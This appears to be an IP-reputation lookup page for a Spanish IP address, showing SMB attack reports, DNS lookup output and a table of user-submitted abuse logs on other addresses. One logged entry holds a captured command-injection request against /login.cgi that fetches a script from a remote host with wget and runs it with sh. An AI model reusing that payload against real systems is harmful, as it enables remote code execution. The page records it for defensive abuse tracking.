2.139.193.157 - IPInfo

Basic Info

City: unknown

Region: unknown

Country: Spain

Internet Service Provider: Telefonica de Espana Sau

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:

Make a comment on this IP

Type	Details	Datetime
attack	Unauthorized connection attempt from IP address 2.139.193.157 on Port 445(SMB)	2020-02-01 02:34:57
attackspam	Unauthorized connection attempt from IP address 2.139.193.157 on Port 445(SMB)	2019-12-07 05:50:55

Comments on same subnet:

No discussion about this subnet yet..

Whois info:

Dig info:


; <<>> DiG 9.10.3-P4-Ubuntu <<>> 2.139.193.157
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 41039
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;2.139.193.157.			IN	A

;; AUTHORITY SECTION:
.			1614	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019051200 1800 900 604800 86400

;; Query time: 1 msec
;; SERVER: 67.207.67.2#53(67.207.67.2)
;; WHEN: Sun May 12 15:44:11 CST 2019
;; MSG SIZE  rcvd: 117

Host info

157.193.139.2.in-addr.arpa domain name pointer 157.red-2-139-193.staticip.rima-tde.net.

Nslookup info:

Server:		67.207.67.2
Address:	67.207.67.2#53

Non-authoritative answer:
157.193.139.2.in-addr.arpa	name = 157.red-2-139-193.staticip.rima-tde.net.

Authoritative answers can be found from:

Related IP info:

Related comments:

IP	Type	Details	Datetime
220.176.196.214	attackbotsspam	21/tcp 21/tcp 21/tcp... [2019-07-29/08-06]13pkt,1pt.(tcp)	2019-08-07 09:55:36
5.39.79.48	attackspam	Aug 7 03:48:43 mout sshd[21566]: Invalid user redmine from 5.39.79.48 port 59108	2019-08-07 09:54:20
37.142.192.49	attackspam	445/tcp 445/tcp 445/tcp... [2019-06-22/08-06]5pkt,1pt.(tcp)	2019-08-07 09:44:12
104.149.70.34	attack	RDP Bruteforce	2019-08-07 10:17:50
139.28.58.225	attackbots	firewall-block, port(s): 8080/tcp	2019-08-07 10:11:56
187.10.249.248	attackspam	23/tcp [2019-08-06]1pkt	2019-08-07 10:02:02
115.230.49.120	attackspambots	23/tcp [2019-08-06]1pkt	2019-08-07 10:04:55
138.186.42.250	attackspam	Caught in portsentry honeypot	2019-08-07 10:20:13
89.248.172.16	attack	scan r	2019-08-07 09:47:28
107.131.222.116	attackbotsspam	107.131.222.116 - - \[07/Aug/2019:01:13:23 +0200\] "GET /login.cgi\?cli=aa%20aa%27\;wget%20http://158.255.5.216/t%20-O%20-%3E%20/tmp/t\;sh%20/tmp/t%27$ HTTP/1.1" 400 173 "-" "Hello, World" ...	2019-08-07 09:36:05
167.99.15.245	attack	Aug 7 02:20:01 ns41 sshd[31863]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=167.99.15.245	2019-08-07 10:15:31
142.93.90.202	attackbotsspam	Aug 7 07:17:45 vibhu-HP-Z238-Microtower-Workstation sshd\[25986\]: Invalid user admin from 142.93.90.202 Aug 7 07:17:45 vibhu-HP-Z238-Microtower-Workstation sshd\[25986\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.90.202 Aug 7 07:17:47 vibhu-HP-Z238-Microtower-Workstation sshd\[25986\]: Failed password for invalid user admin from 142.93.90.202 port 59984 ssh2 Aug 7 07:27:30 vibhu-HP-Z238-Microtower-Workstation sshd\[26243\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.90.202 user=postgres Aug 7 07:27:31 vibhu-HP-Z238-Microtower-Workstation sshd\[26243\]: Failed password for postgres from 142.93.90.202 port 52142 ssh2 ...	2019-08-07 10:11:01
180.171.134.58	attackspam	445/tcp [2019-08-06]1pkt	2019-08-07 10:16:29
5.62.41.134	attack	\[2019-08-06 22:03:54\] NOTICE\[2288\] chan_sip.c: Registration from '\' failed for '5.62.41.134:1096' - Wrong password \[2019-08-06 22:03:54\] SECURITY\[2326\] res_security_log.c: SecurityEvent="InvalidPassword",EventTV="2019-08-06T22:03:54.985-0400",Severity="Error",Service="SIP",EventVersion="2",AccountID="72478",SessionID="0x7ff4d0160998",LocalAddress="IPV4/UDP/192.168.244.6/5060",RemoteAddress="IPV4/UDP/5.62.41.134/50042",Challenge="158fee01",ReceivedChallenge="158fee01",ReceivedHash="17737d10c021f4ef7c65986fdf0d16b2" \[2019-08-06 22:04:34\] NOTICE\[2288\] chan_sip.c: Registration from '\' failed for '5.62.41.134:1010' - Wrong password \[2019-08-06 22:04:34\] SECURITY\[2326\] res_security_log.c: SecurityEvent="InvalidPassword",EventTV="2019-08-06T22:04:34.705-0400",Severity="Error",Service="SIP",EventVersion="2",AccountID="78334",SessionID="0x7ff4d0348688",LocalAddress="IPV4/UDP/192.168.244.6/5060",RemoteAddress="IPV4/UDP/5.62.41.134/6	2019-08-07 10:06:05
213.86.130.4	attack	445/tcp 445/tcp 445/tcp... [2019-07-10/08-06]5pkt,1pt.(tcp)	2019-08-07 09:45:36

Recently Reported IPs

178.19.180.202	110.133.141.10	203.171.227.205	78.207.105.133
28.214.34.93	24.231.89.180	81.170.216.236	222.170.168.106
125.21.179.190	2.187.22.39	217.22.112.178	51.83.77.224
123.25.121.215	162.243.149.170	94.249.34.6	205.185.120.241
104.238.37.208	192.169.243.124	89.38.145.93	195.25.27.89